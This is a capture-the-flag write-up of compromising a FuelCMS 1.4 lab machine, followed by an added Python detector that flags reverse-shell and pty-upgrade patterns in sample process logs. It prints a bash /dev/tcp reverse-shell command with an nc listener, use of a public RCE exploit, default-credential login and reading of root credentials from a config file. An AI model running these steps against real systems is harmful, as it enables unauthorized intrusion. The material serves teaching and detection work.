# Write-Up

### <mark style="color:purple;">Objectives</mark>

In this machine, we are tasked with finding two specific items: **user.txt** and **root.txt**.

***

### <mark style="color:purple;">Reconnaissance</mark>

We start by running an **nmap** scan on the most common 100 ports to identify open services:

```bash
nmap -F --open <ip_victim>
```

The <mark style="color:orange;">**-F**</mark> flag scans the top 100 common ports, and <mark style="color:orange;">**--open**</mark> shows only open ports.

<figure><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXcam0MIj6qCY_4CnPIGdK3fAgSOlHwQVRwC08JfY4KTVJMGYQPXlbW-899jF0momXmLvjoRx-GtZyZGMtKd8toR65xLV7XLN6VWYFUcGKaat7QdtRyl47b_MtXLpJkn4PJoFNraHQ?key=yJV8R1W3WJ0ftC-DkpFfQVa7" alt=""><figcaption></figcaption></figure>

The scan reveals that port **80** is open. We visit the web page at:

```bash
http://<ip_victim>
```

<figure><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXesh7LUMN9roEAVQAxDXqxcBKMMsBsj91PWQWTgte5H6-MO-jhIlFL3FfuJiefE2DEEdWRpsAb_dPfTgSrclJHxqd4_U-A5JVHgZ_8guVIUxKoONRHbrUVn_thCDskgBVkb-9MY-Q?key=yJV8R1W3WJ0ftC-DkpFfQVa7" alt=""><figcaption></figcaption></figure>

We find a landing page for **FuelCMS**, version **1.4**. Reading the configuration steps, we notice a link to the **admin** panel.

Upon closer inspection of the landing page, we find default admin credentials listed: **admin/admin**. We attempt to log in to the **admin** panel using these credentials and successfully gain access.

<figure><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXfkAP9cvjrrYpZ7Gl1PrNaiBmLbfmS8WOBk8BtPtTK83QLB-BS5mVfijHQaUbK0GbrnvyEhv8Ai_assE3GM0o1Ae8oJ4FpSxZGu7LhAw9MO0WRsAGNsr9rNhKIiksXRyDgl9Kc1mA?key=yJV8R1W3WJ0ftC-DkpFfQVa7" alt=""><figcaption></figcaption></figure>

***

### <mark style="color:purple;">Exploitation</mark>

Once inside, the CMS seems recently installed and quite empty. Given the CMS version, we check [**exploit-db.com**](http://www.exploit-db.com) for potential vulnerabilities.

We discover three Remote Code Execution (RCE) exploits. We opt for the third one, written in **Python3**, as it is current and well-documented.

<figure><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXcdybBB4xihZ6LbZrQ95BT2GIqG3ZHYqWcOPLDCb5t8HkwwGAilBMcYeXTtcsnmToKBXWXNXu5XgVWlcT99acPpkODAfEGYY93txqjD1UGEH-nSb6yGMw3ndPGDWww0SCrYY-VVrA?key=yJV8R1W3WJ0ftC-DkpFfQVa7" alt=""><figcaption></figcaption></figure>

We copy the exploit to a file named **fuel.py** and run it:

```bash
python3 fuel.py -u <url_victim>
```

This provides a web shell running as **www-data**. Checking the directories, we locate **user.txt** and read its contents.

<figure><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXdwhAoa7DjqmoKFKDckFKSmwUTr-ArskMvTXu2uTSNQd6CrXeFS-mFPS780WRSDPmA5DqW0wdYojl49wgKuYtTD5oXm-oVLJl-vSk3ZhzAmhQON42houBQq0_EA6mziQt9F6STvyQ?key=yJV8R1W3WJ0ftC-DkpFfQVa7" alt=""><figcaption></figcaption></figure>

<figure><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXf2xMu7uiBcy4sGlf3BRqK_K1_S695y7EFKPTuztegsQVVTWBPPS-zumk6CQ6j_OgGwiCkYNdmssLXD-mIjvrpkGkCTxCqJuLq5LVZpo-oKdyWx1srRoK9lkUCcECxf0Asbp0XaMg?key=yJV8R1W3WJ0ftC-DkpFfQVa7" alt="" width="375"><figcaption></figcaption></figure>

***

### <mark style="color:purple;">Privilege Escalation</mark>

The web shell does not allow us to input passwords for **sudo** commands, limiting our ability to escalate privileges. To overcome this, we establish a **reverse shell**.

We start a listener on our local machine:

```bash
nc -lnvp 4444
```

Then, on the victim machine, we run:

```bash
bash -c "bash -i >& /dev/tcp/<our_ip>/4444 0>&1"
```

To find our IP, we run **`ifconfig`** and use the IP under **tun0**.

<figure><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXcIft6u9ki1oQ0Ra8WGRPPyM8SDSfuweMQJmiAcSjtsWJrqLc6FIwS_d2mdip7lGT8iKsM4W-5JB6FvO840LvO87fDW-j4-OEDOe02H66u-fnr0ZfSGvvv5R37GoWTD2jwRhEiP6A?key=yJV8R1W3WJ0ftC-DkpFfQVa7" alt=""><figcaption></figcaption></figure>

With the reverse shell active, we check the FuelCMS landing page again. The database configuration file mentioned in step 2 catches our attention.

<figure><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXd3UCmzMGflxjKl3JATFvxTXZsqZgJO9IiMjpIFySpYlZWNkqV6v1pgO6iKD7ceto2Awo_Aye2fEuL2R_TV_TUkuL1rToiGv5NfJV2oE0wqWx_34jOuRUkht65mMbdu4b9mGXSvxg?key=yJV8R1W3WJ0ftC-DkpFfQVa7" alt=""><figcaption></figcaption></figure>

We inspect it:

```bash
cat /path/to/config/database.php
```

<figure><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXeO1HO1HYbaaafIv1XSMwG_j7-p1Rw7kNHQ0gSGZYR8jgGBs1Gy-nEjIc0DwTOT9VU97Y0eDjazOelEZImoWUxnbbOW-2Pv3AtamEgesDSIwgt373cRytBIcEBWYzj-jGdT7ayyXQ?key=yJV8R1W3WJ0ftC-DkpFfQVa7" alt="" width="375"><figcaption></figcaption></figure>

At the bottom, we find the **root** credentials:

```bash
username: root
password: mememe
```

However, trying to switch to root gives us a terminal error: the password prompt needs a real TTY, which the plain reverse shell lacks. We need a better shell, so we spawn a **pseudo-terminal** for full interaction:

```bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
```

<figure><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXdmA0wSddrnSKM6OJKAAndr18SCo9qZuelqbDNTcxDKzIaA2QIfMvLSSa4Twtv4OEooGaDDpmXuzXK5zDNDt6Yq27NwIXKv9WjBKRY8JObeZYwO9R-ZmaLkeUC6_PZU8Z61Pz0-?key=yJV8R1W3WJ0ftC-DkpFfQVa7" alt="" width="375"><figcaption></figcaption></figure>

Now we try switching to root again, and it works. We locate **root.txt** and read its contents.

<figure><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXd-6m4ZxDlcDq9cpOdkWQZ7UO8PleLIHjX9ISabxUO2mJWQQ1kuPAlUKnmCfsRwrCmQof2a6RSr7mf_jBZBI6oPjiRfOkC7kKrP1lvw2bVwT5YIN4LpWwvFPWJTzxxZjL6mKEfaaw?key=yJV8R1W3WJ0ftC-DkpFfQVa7" alt="" width="375"><figcaption></figcaption></figure>
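From the defender's side, the reverse shell and the pty upgrade used above leave a distinctive trace in process-execution logs. The following is an added example and not part of the original write-up: it parses constructed process events (the log format, uid 33 for www-data and the 10.10.14.5 address are all assumptions) and flags the bash /dev/tcp pattern, the pty.spawn upgrade, and any shell spawned directly by a web server process.

```python
import re

# Constructed sample process-execution events (not taken from the original write-up).
# Assumed format, one event per line: "<timestamp> uid=<uid> parent=<parent comm> cmd=<command line>"
# uid 33 is assumed to be www-data; 10.10.14.5 is a made-up attacker address.
SAMPLE_LOG = """\
2024-01-01T10:00:01Z uid=33 parent=apache2 cmd=bash -c "bash -i >& /dev/tcp/10.10.14.5/4444 0>&1"
2024-01-01T10:00:09Z uid=33 parent=bash cmd=python3 -c 'import pty; pty.spawn("/bin/bash")'
2024-01-01T10:01:00Z uid=33 parent=apache2 cmd=php /var/www/html/index.php
2024-01-01T10:02:00Z uid=1000 parent=sshd cmd=ls -la /home/user
2024-01-01T10:03:00Z uid=0 parent=cron cmd=/usr/bin/python3 /opt/backup.py
"""

EVENT_RE = re.compile(r"^(?P<ts>\S+) uid=(?P<uid>\d+) parent=(?P<parent>\S+) cmd=(?P<cmd>.*)$")
WEB_SERVERS = {"apache2", "httpd", "nginx", "php-fpm"}
SHELLS = {"bash", "sh", "dash", "zsh", "/bin/bash", "/bin/sh", "/bin/dash"}
DEV_TCP_RE = re.compile(r"/dev/(tcp|udp)/\S+/\d+")  # bash network pseudo-device used by the reverse shell
PTY_RE = re.compile(r"pty\.spawn\(")                # interactive-TTY upgrade via Python's pty module


def classify(cmd: str, parent: str) -> list[str]:
    """Return the names of the detection rules a single process event triggers."""
    hits = []
    if DEV_TCP_RE.search(cmd):
        hits.append("bash_dev_tcp_reverse_shell")
    if PTY_RE.search(cmd):
        hits.append("pty_shell_upgrade")
    tokens = cmd.split()
    argv0 = tokens[0] if tokens else ""
    if parent in WEB_SERVERS and argv0 in SHELLS:
        hits.append("webserver_spawned_shell")
    return hits


def scan_log(text: str) -> list[dict]:
    """Parse every event line and return only the events that trigger at least one rule."""
    findings = []
    for line in text.splitlines():
        m = EVENT_RE.match(line)
        if not m:
            continue  # skip lines that do not follow the assumed format
        rules = classify(m["cmd"], m["parent"])
        if rules:
            findings.append({"ts": m["ts"], "uid": int(m["uid"]), "parent": m["parent"], "rules": rules})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} uid={f['uid']} parent={f['parent']}: {', '.join(f['rules'])}")
```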
